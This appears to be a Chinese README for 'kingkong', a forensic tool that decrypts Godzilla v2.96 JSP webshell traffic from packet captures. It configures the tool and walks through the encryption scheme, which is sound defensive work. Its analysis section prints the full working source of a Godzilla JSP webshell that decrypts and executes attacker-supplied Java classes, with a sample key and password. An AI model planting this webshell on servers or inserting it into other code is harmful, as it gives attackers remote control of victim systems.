kingkong
解密哥斯拉Godzilla-V2.96 webshell管理工具流量
目前只支持jsp类型的webshell流量解密
Usage
- 获取攻击者上传到服务器的webshell样本
- 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以
test.papng为例。
- 导出所有http对象,放置到文件夹
- 编辑
kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径
- py -2 kingkong.py
Config
#config
#配置webshell的key
key = '3c6e0b8a9c15224a'
#配置webshell的password
password = 'pass'
#配置wireshark导出http对象的路径
filepath = '.'
#配置是否为jsp+base64,设置False则对JAVA_AES_RAW流量解密,设置True则对JAVA_AES_BASE64流量解密
isbase64 = False
Analysis
- 对生成的webshell格式化
<%
try{
byte[] data=base64Decode(request.getParameter(pass));
data=x(data, false);
if (session.getAttribute("payload")==null)
{
session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));
}else
{
request.setAttribute("parameters", new String(data));
Object f=((Class)session.getAttribute("payload")).newInstance();
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
response.getWriter().write(md5.substring(16));
}
}catch (Exception e)
{
}
%>
">
<%! String xc="3c6e0b8a9c15224a"; //md5("key")[0:16] String pass="pass"; //get参数 String md5=md5(pass+xc); //响应分隔符 class X extends ClassLoader { public X(ClassLoader z) { super(z); } public Class Q(byte[] cb) { return super.defineClass(cb, 0, cb.length); } } //aes解密 public byte[] x(byte[] s,boolean m) { try{ javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES"); c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES")); return c.doFinal(s); }catch (Exception e) { return null; } } //md5 16位大写 public static String md5(String s) { String ret = null; try { java.security.MessageDigest m; m = java.security.MessageDigest.getInstance("MD5"); m.update(s.getBytes(), 0, s.length()); ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); } catch (Exception e) {} return ret; } //base64编码 public static String base64Encode(byte[] bs) throws Exception { Class base64; String value = null; try { base64=Class.forName("java.util.Base64"); Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } //base64解码 public static byte[] base64Decode(String bs) throws Exception { Class base64; byte[] value = null; try { base64=Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs }); } catch (Exception e) { try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs }); } catch (Exception e2) { } } return value; } %> <% try{ byte[] data=base64Decode(request.getParameter(pass)); data=x(data, false); if (session.getAttribute("payload")==null) { session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data)); }else { request.setAttribute("parameters", new String(data)); Object f=((Class)session.getAttribute("payload")).newInstance(); f.equals(pageContext); response.getWriter().write(md5.substring(0,16)); response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true))); response.getWriter().write(md5.substring(16)); } }catch (Exception e) { } %>
- 可以看到主要有base64编码解码、aes解密、md5 hash功能 其中重点关注密钥参数:
String xc="3c6e0b8a9c15224a";
- 该参数由生成webshell中的“密钥”参数定义,具体值为:
md5(xc)[0:16]
- webshell客户端接收到服务端下发的指令后,进行base64解码,aes解密处理完成后,生成响应报文,其中报文结构为:
md5(pass+xc)[0:16]+base64编码的木马执行结果+md5(pass+xc)[16]
1 Dec 03, 2021
36 Dec 20, 2022
0 Aug 28, 2022
3 Nov 28, 2021
1 Dec 24, 2021
3 Jan 26, 2022
4 Jan 27, 2022
144 Nov 19, 2022
135 Dec 14, 2022
28 Oct 28, 2022
4.9k Jan 08, 2023
675 Jan 03, 2023
30 Jan 17, 2022
11 Nov 17, 2022
576 Dec 23, 2022
14 Nov 11, 2022
795 Dec 29, 2022
29 Dec 16, 2022
100 Dec 23, 2022
1 Jan 11, 2022